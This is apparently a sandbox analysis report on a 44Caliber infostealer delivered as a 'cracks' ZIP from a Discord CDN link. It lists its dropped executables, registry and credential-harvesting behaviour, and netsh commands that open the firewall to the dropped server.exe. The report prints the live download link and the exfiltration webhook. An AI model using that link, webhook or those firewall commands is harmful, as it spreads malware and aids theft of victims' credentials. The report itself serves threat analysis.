44caliber | hxxps://cdn[.]discordapp[.]com/attachments/1213539495215898745/1213578524061990972/OxyCracks_NL[.]zip?ex=65f5fc13&is=65e38713&hm=dbf6abb58f3a7a0bff1d75c9df68bb44f0758ad1bc62a2e1db656b5f30887a3a&

Analysis

max time kernel
66s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
03-03-2024 18:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://cdn.discordapp.com/attachments/1213539495215898745/1213578524061990972/OxyCracks_NL.zip?ex=65f5fc13&is=65e38713&hm=dbf6abb58f3a7a0bff1d75c9df68bb44f0758ad1bc62a2e1db656b5f30887a3a&

Score

10^/10

44caliber evasion spyware stealer upx

Malware Config

Extracted

Family

44caliber

https://discord.com/api/webhooks/1213552478973333615/HgqZhFkfFc23la94axmDeeor-_w_RVjs_T-hJoCsewm4NGKl8540wNg3DAdr43d0NjoV

Signatures

44Caliber
An open source infostealer written in C#.
stealer 44caliber

Blocklisted process makes network request 2 IoCs

flow	pid	Process
65	868	Insidious.exe
67	868	Insidious.exe

Modifies Windows Firewall 2 TTPs 9 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
4696	netsh.exe
4868	netsh.exe
5756	netsh.exe
5748	netsh.exe
5648	netsh.exe
2468	netsh.exe
3948	netsh.exe
5668	netsh.exe
1524	netsh.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation	NL By Oxy.exe
Key value queried	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation	Never Give Up.exe
Key value queried	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation	Oxy.exe

Executes dropped EXE 9 IoCs

pid	Process
4536	NL By Oxy.exe
3624	Oxy.exe
1060	CiliBaba.exe
2604	Never Give Up.exe
868	Insidious.exe
3588	Built.exe
3540	Built.exe
4980	server.exe
4508	server.exe

Loads dropped DLL 16 IoCs

pid	Process
3540	Built.exe
3540	Built.exe
3540	Built.exe
3540	Built.exe
3540	Built.exe
3540	Built.exe
3540	Built.exe
3540	Built.exe
3540	Built.exe
3540	Built.exe
3540	Built.exe
3540	Built.exe
3540	Built.exe
3540	Built.exe
3540	Built.exe
3540	Built.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0007000000023277-205.dat	upx
behavioral1/files/0x0007000000023277-196.dat	upx
behavioral1/files/0x0007000000023258-212.dat	upx
behavioral1/files/0x0007000000023262-231.dat	upx
behavioral1/files/0x0007000000023260-230.dat	upx
behavioral1/files/0x000700000002325c-246.dat	upx
behavioral1/files/0x0007000000023257-247.dat	upx
behavioral1/files/0x000700000002327f-249.dat	upx
behavioral1/files/0x0007000000023274-258.dat	upx
behavioral1/files/0x000700000002325a-266.dat	upx
behavioral1/memory/3540-261-0x00007FFA6D5B0000-0x00007FFA6D726000-memory.dmp	upx
behavioral1/memory/3540-260-0x00007FFA6E830000-0x00007FFA6E853000-memory.dmp	upx
behavioral1/memory/3540-255-0x00007FFA762D0000-0x00007FFA762E9000-memory.dmp	upx
behavioral1/files/0x000700000002327d-254.dat	upx
behavioral1/files/0x0008000000023267-257.dat	upx
behavioral1/memory/3540-253-0x00007FFA894A0000-0x00007FFA894AF000-memory.dmp	upx
behavioral1/files/0x000700000002325f-251.dat	upx
behavioral1/files/0x000700000002325e-228.dat	upx
behavioral1/files/0x0007000000023259-225.dat	upx
behavioral1/files/0x0007000000023281-223.dat	upx
behavioral1/files/0x000700000002327f-222.dat	upx
behavioral1/memory/3540-269-0x00007FFA693D0000-0x00007FFA698F9000-memory.dmp	upx
behavioral1/files/0x0007000000023272-215.dat	upx
behavioral1/memory/3540-274-0x00007FFA6BC80000-0x00007FFA6BD4D000-memory.dmp	upx
behavioral1/memory/3540-278-0x00007FFA84E70000-0x00007FFA84E7D000-memory.dmp	upx
behavioral1/memory/3540-286-0x00007FFA6EEC0000-0x00007FFA6EEE4000-memory.dmp	upx
behavioral1/memory/3540-289-0x00007FFA6EE90000-0x00007FFA6EEBD000-memory.dmp	upx
behavioral1/memory/3540-284-0x00007FFA6E860000-0x00007FFA6EE50000-memory.dmp	upx
behavioral1/memory/3540-290-0x00007FFA75FC0000-0x00007FFA75FD9000-memory.dmp	upx
behavioral1/memory/3540-292-0x00007FFA84F90000-0x00007FFA84F9D000-memory.dmp	upx
behavioral1/memory/3540-293-0x00007FFA6C7D0000-0x00007FFA6C803000-memory.dmp	upx
behavioral1/memory/3540-296-0x00007FFA6D590000-0x00007FFA6D5A4000-memory.dmp	upx
behavioral1/memory/3540-412-0x00007FFA6BB60000-0x00007FFA6BC7C000-memory.dmp	upx
behavioral1/memory/3540-465-0x00007FFA6E860000-0x00007FFA6EE50000-memory.dmp	upx
behavioral1/memory/3540-467-0x00007FFA6EEC0000-0x00007FFA6EEE4000-memory.dmp	upx
behavioral1/memory/3540-476-0x00007FFA894A0000-0x00007FFA894AF000-memory.dmp	upx
behavioral1/memory/3540-477-0x00007FFA6EE90000-0x00007FFA6EEBD000-memory.dmp	upx
behavioral1/memory/3540-478-0x00007FFA762D0000-0x00007FFA762E9000-memory.dmp	upx
behavioral1/memory/3540-479-0x00007FFA6E830000-0x00007FFA6E853000-memory.dmp	upx
behavioral1/memory/3540-480-0x00007FFA6D5B0000-0x00007FFA6D726000-memory.dmp	upx
behavioral1/memory/3540-481-0x00007FFA75FC0000-0x00007FFA75FD9000-memory.dmp	upx
behavioral1/memory/3540-482-0x00007FFA84F90000-0x00007FFA84F9D000-memory.dmp	upx
behavioral1/memory/3540-483-0x00007FFA6C7D0000-0x00007FFA6C803000-memory.dmp	upx
behavioral1/memory/3540-485-0x00007FFA6BC80000-0x00007FFA6BD4D000-memory.dmp	upx
behavioral1/memory/3540-484-0x00007FFA693D0000-0x00007FFA698F9000-memory.dmp	upx
behavioral1/memory/3540-486-0x00007FFA6D590000-0x00007FFA6D5A4000-memory.dmp	upx
behavioral1/memory/3540-487-0x00007FFA84E70000-0x00007FFA84E7D000-memory.dmp	upx
behavioral1/memory/3540-488-0x00007FFA6BB60000-0x00007FFA6BC7C000-memory.dmp	upx
behavioral1/memory/3052-735-0x00007FFA8DEB0000-0x00007FFA8DEBF000-memory.dmp	upx
behavioral1/memory/3052-741-0x00007FFA6E860000-0x00007FFA6EE50000-memory.dmp	upx
behavioral1/memory/3052-743-0x00007FFA73950000-0x00007FFA73974000-memory.dmp	upx
behavioral1/memory/3052-896-0x00007FFA6E860000-0x00007FFA6EE50000-memory.dmp	upx
behavioral1/memory/3052-898-0x00007FFA8DEB0000-0x00007FFA8DEBF000-memory.dmp	upx
behavioral1/memory/3052-899-0x00007FFA73600000-0x00007FFA7362D000-memory.dmp	upx
behavioral1/memory/3052-900-0x00007FFA84CF0000-0x00007FFA84D09000-memory.dmp	upx
behavioral1/memory/3052-897-0x00007FFA73950000-0x00007FFA73974000-memory.dmp	upx
behavioral1/memory/3052-901-0x00007FFA735D0000-0x00007FFA735F3000-memory.dmp	upx
behavioral1/memory/3052-902-0x00007FFA731F0000-0x00007FFA73366000-memory.dmp	upx
behavioral1/memory/3052-903-0x00007FFA75FC0000-0x00007FFA75FD9000-memory.dmp	upx
behavioral1/memory/3052-905-0x00007FFA73590000-0x00007FFA735C3000-memory.dmp	upx
behavioral1/memory/3052-904-0x00007FFA84E70000-0x00007FFA84E7D000-memory.dmp	upx
behavioral1/memory/3052-906-0x00007FFA693D0000-0x00007FFA698F9000-memory.dmp	upx
behavioral1/memory/3052-907-0x00007FFA73120000-0x00007FFA731ED000-memory.dmp	upx
behavioral1/memory/3052-908-0x00007FFA738D0000-0x00007FFA738E4000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
65	freegeoip.app
83	freegeoip.app
63	freegeoip.app

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\server.exe	Oxy.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	Insidious.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Insidious.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery

T1057

pid	Process
884	tasklist.exe
5988	tasklist.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000_Classes\Local Settings	msedge.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

pid	Process
3176	msedge.exe
3176	msedge.exe
3652	msedge.exe
3652	msedge.exe
1572	identity_helper.exe
1572	identity_helper.exe
4444	msedge.exe
4444	msedge.exe
868	Insidious.exe
868	Insidious.exe
868	Insidious.exe
868	Insidious.exe
868	Insidious.exe
868	Insidious.exe
6048	powershell.exe
6048	powershell.exe
6032	powershell.exe
6032	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe

Suspicious use of AdjustPrivilegeToken 50 IoCs

description	pid	Process
Token: SeRestorePrivilege	1624	7zG.exe
Token: 35	1624	7zG.exe
Token: SeSecurityPrivilege	1624	7zG.exe
Token: SeSecurityPrivilege	1624	7zG.exe
Token: SeDebugPrivilege	868	Insidious.exe
Token: SeIncreaseQuotaPrivilege	6020	WMIC.exe
Token: SeSecurityPrivilege	6020	WMIC.exe
Token: SeTakeOwnershipPrivilege	6020	WMIC.exe
Token: SeLoadDriverPrivilege	6020	WMIC.exe
Token: SeSystemProfilePrivilege	6020	WMIC.exe
Token: SeSystemtimePrivilege	6020	WMIC.exe
Token: SeProfSingleProcessPrivilege	6020	WMIC.exe
Token: SeIncBasePriorityPrivilege	6020	WMIC.exe
Token: SeCreatePagefilePrivilege	6020	WMIC.exe
Token: SeBackupPrivilege	6020	WMIC.exe
Token: SeRestorePrivilege	6020	WMIC.exe
Token: SeShutdownPrivilege	6020	WMIC.exe
Token: SeDebugPrivilege	6020	WMIC.exe
Token: SeSystemEnvironmentPrivilege	6020	WMIC.exe
Token: SeRemoteShutdownPrivilege	6020	WMIC.exe
Token: SeUndockPrivilege	6020	WMIC.exe
Token: SeManageVolumePrivilege	6020	WMIC.exe
Token: 33	6020	WMIC.exe
Token: 34	6020	WMIC.exe
Token: 35	6020	WMIC.exe
Token: 36	6020	WMIC.exe
Token: SeDebugPrivilege	5988	tasklist.exe
Token: SeIncreaseQuotaPrivilege	6020	WMIC.exe
Token: SeSecurityPrivilege	6020	WMIC.exe
Token: SeTakeOwnershipPrivilege	6020	WMIC.exe
Token: SeLoadDriverPrivilege	6020	WMIC.exe
Token: SeSystemProfilePrivilege	6020	WMIC.exe
Token: SeSystemtimePrivilege	6020	WMIC.exe
Token: SeProfSingleProcessPrivilege	6020	WMIC.exe
Token: SeIncBasePriorityPrivilege	6020	WMIC.exe
Token: SeCreatePagefilePrivilege	6020	WMIC.exe
Token: SeBackupPrivilege	6020	WMIC.exe
Token: SeRestorePrivilege	6020	WMIC.exe
Token: SeShutdownPrivilege	6020	WMIC.exe
Token: SeDebugPrivilege	6020	WMIC.exe
Token: SeSystemEnvironmentPrivilege	6020	WMIC.exe
Token: SeRemoteShutdownPrivilege	6020	WMIC.exe
Token: SeUndockPrivilege	6020	WMIC.exe
Token: SeManageVolumePrivilege	6020	WMIC.exe
Token: 33	6020	WMIC.exe
Token: 34	6020	WMIC.exe
Token: 35	6020	WMIC.exe
Token: 36	6020	WMIC.exe
Token: SeDebugPrivilege	6048	powershell.exe
Token: SeDebugPrivilege	6032	powershell.exe

Suspicious use of FindShellTrayWindow 36 IoCs

pid	Process
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
1624	7zG.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe
3652	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3652 wrote to memory of 4196	3652	msedge.exe	90
PID 3652 wrote to memory of 4196	3652	msedge.exe	90
PID 3652 wrote to memory of 3828	3652	msedge.exe	91
PID 3652 wrote to memory of 3828	3652	msedge.exe	91
PID 3652 wrote to memory of 3828	3652	msedge.exe	91
PID 3652 wrote to memory of 3828	3652	msedge.exe	91
PID 3652 wrote to memory of 3828	3652	msedge.exe	91
PID 3652 wrote to memory of 3828	3652	msedge.exe	91
PID 3652 wrote to memory of 3828	3652	msedge.exe	91
PID 3652 wrote to memory of 3828	3652	msedge.exe	91
PID 3652 wrote to memory of 3828	3652	msedge.exe	91
PID 3652 wrote to memory of 3828	3652	msedge.exe	91
PID 3652 wrote to memory of 3828	3652	msedge.exe	91
PID 3652 wrote to memory of 3828	3652	msedge.exe	91
PID 3652 wrote to memory of 3828	3652	msedge.exe	91
PID 3652 wrote to memory of 3828	3652	msedge.exe	91
PID 3652 wrote to memory of 3828	3652	msedge.exe	91
PID 3652 wrote to memory of 3828	3652	msedge.exe	91
PID 3652 wrote to memory of 3828	3652	msedge.exe	91
PID 3652 wrote to memory of 3828	3652	msedge.exe	91
PID 3652 wrote to memory of 3828	3652	msedge.exe	91
PID 3652 wrote to memory of 3828	3652	msedge.exe	91
PID 3652 wrote to memory of 3828	3652	msedge.exe	91
PID 3652 wrote to memory of 3828	3652	msedge.exe	91
PID 3652 wrote to memory of 3828	3652	msedge.exe	91
PID 3652 wrote to memory of 3828	3652	msedge.exe	91
PID 3652 wrote to memory of 3828	3652	msedge.exe	91
PID 3652 wrote to memory of 3828	3652	msedge.exe	91
PID 3652 wrote to memory of 3828	3652	msedge.exe	91
PID 3652 wrote to memory of 3828	3652	msedge.exe	91
PID 3652 wrote to memory of 3828	3652	msedge.exe	91
PID 3652 wrote to memory of 3828	3652	msedge.exe	91
PID 3652 wrote to memory of 3828	3652	msedge.exe	91
PID 3652 wrote to memory of 3828	3652	msedge.exe	91
PID 3652 wrote to memory of 3828	3652	msedge.exe	91
PID 3652 wrote to memory of 3828	3652	msedge.exe	91
PID 3652 wrote to memory of 3828	3652	msedge.exe	91
PID 3652 wrote to memory of 3828	3652	msedge.exe	91
PID 3652 wrote to memory of 3828	3652	msedge.exe	91
PID 3652 wrote to memory of 3828	3652	msedge.exe	91
PID 3652 wrote to memory of 3828	3652	msedge.exe	91
PID 3652 wrote to memory of 3828	3652	msedge.exe	91
PID 3652 wrote to memory of 3176	3652	msedge.exe	92
PID 3652 wrote to memory of 3176	3652	msedge.exe	92
PID 3652 wrote to memory of 1400	3652	msedge.exe	93
PID 3652 wrote to memory of 1400	3652	msedge.exe	93
PID 3652 wrote to memory of 1400	3652	msedge.exe	93
PID 3652 wrote to memory of 1400	3652	msedge.exe	93
PID 3652 wrote to memory of 1400	3652	msedge.exe	93
PID 3652 wrote to memory of 1400	3652	msedge.exe	93
PID 3652 wrote to memory of 1400	3652	msedge.exe	93
PID 3652 wrote to memory of 1400	3652	msedge.exe	93
PID 3652 wrote to memory of 1400	3652	msedge.exe	93
PID 3652 wrote to memory of 1400	3652	msedge.exe	93
PID 3652 wrote to memory of 1400	3652	msedge.exe	93
PID 3652 wrote to memory of 1400	3652	msedge.exe	93
PID 3652 wrote to memory of 1400	3652	msedge.exe	93
PID 3652 wrote to memory of 1400	3652	msedge.exe	93
PID 3652 wrote to memory of 1400	3652	msedge.exe	93
PID 3652 wrote to memory of 1400	3652	msedge.exe	93
PID 3652 wrote to memory of 1400	3652	msedge.exe	93
PID 3652 wrote to memory of 1400	3652	msedge.exe	93
PID 3652 wrote to memory of 1400	3652	msedge.exe	93
PID 3652 wrote to memory of 1400	3652	msedge.exe	93

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn.discordapp.com/attachments/1213539495215898745/1213578524061990972/OxyCracks_NL.zip?ex=65f5fc13&is=65e38713&hm=dbf6abb58f3a7a0bff1d75c9df68bb44f0758ad1bc62a2e1db656b5f30887a3a&
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3652
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa84c246f8,0x7ffa84c24708,0x7ffa84c24718
  2⤵
  PID:4196
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2184,8816039493895933784,2077354253199166986,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2204 /prefetch:2
  2⤵
  PID:3828
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2184,8816039493895933784,2077354253199166986,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3176
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2184,8816039493895933784,2077354253199166986,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2744 /prefetch:8
  2⤵
  PID:1400
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,8816039493895933784,2077354253199166986,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3248 /prefetch:1
  2⤵
  PID:744
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,8816039493895933784,2077354253199166986,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3252 /prefetch:1
  2⤵
  PID:4860
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2184,8816039493895933784,2077354253199166986,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5380 /prefetch:8
  2⤵
  PID:688
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2184,8816039493895933784,2077354253199166986,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5380 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1572
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,8816039493895933784,2077354253199166986,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4752 /prefetch:1
  2⤵
  PID:1140
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2184,8816039493895933784,2077354253199166986,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4112 /prefetch:8
  2⤵
  PID:828
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2184,8816039493895933784,2077354253199166986,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5692 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4444
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,8816039493895933784,2077354253199166986,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1428 /prefetch:1
  2⤵
  PID:3760
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,8816039493895933784,2077354253199166986,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5132 /prefetch:1
  2⤵
  PID:4312
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,8816039493895933784,2077354253199166986,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6160 /prefetch:1
  2⤵
  PID:1380
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,8816039493895933784,2077354253199166986,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6188 /prefetch:1
  2⤵
  PID:4936

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2320

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:216

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2188

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\OxyCracks_NL\" -ad -an -ai#7zMap18645:86:7zEvent7273
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1624

C:\Users\Admin\Downloads\OxyCracks_NL\OxyCracks NL\NL By Oxy.exe
"C:\Users\Admin\Downloads\OxyCracks_NL\OxyCracks NL\NL By Oxy.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
PID:4536
- C:\Users\Admin\AppData\Local\Temp\Oxy.exe
  "C:\Users\Admin\AppData\Local\Temp\Oxy.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Drops file in Windows directory
  PID:3624
- - C:\Windows\server.exe
    "C:\Windows\server.exe"
    3⤵
    - Executes dropped EXE
    PID:4980
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall add allowedprogram "C:\Windows\server.exe" "server.exe" ENABLE
      4⤵
      Modifies Windows Firewall
      PID:4696
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall delete allowedprogram "C:\Windows\server.exe"
      4⤵
      Modifies Windows Firewall
      PID:1524
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall add allowedprogram "C:\Windows\server.exe" "server.exe" ENABLE
      4⤵
      Modifies Windows Firewall
      PID:2468
- C:\Users\Admin\AppData\Local\Temp\CiliBaba.exe
  "C:\Users\Admin\AppData\Local\Temp\CiliBaba.exe"
  2⤵
  - Executes dropped EXE
  PID:1060
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\CiliBaba.exe" "CiliBaba.exe" ENABLE
    3⤵
    - Modifies Windows Firewall
    PID:3948
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\CiliBaba.exe"
    3⤵
    - Modifies Windows Firewall
    PID:5748
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\CiliBaba.exe" "CiliBaba.exe" ENABLE
    3⤵
    - Modifies Windows Firewall
    PID:5756
- C:\Users\Admin\AppData\Local\Temp\Never Give Up.exe
  "C:\Users\Admin\AppData\Local\Temp\Never Give Up.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:2604
- - C:\Users\Admin\AppData\Roaming\server.exe
    "C:\Users\Admin\AppData\Roaming\server.exe"
    3⤵
    - Executes dropped EXE
    PID:4508
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\server.exe" "server.exe" ENABLE
      4⤵
      Modifies Windows Firewall
      PID:4868
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Roaming\server.exe"
      4⤵
      Modifies Windows Firewall
      PID:5648
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\server.exe" "server.exe" ENABLE
      4⤵
      Modifies Windows Firewall
      PID:5668
- C:\Users\Admin\AppData\Local\Temp\Insidious.exe
  "C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
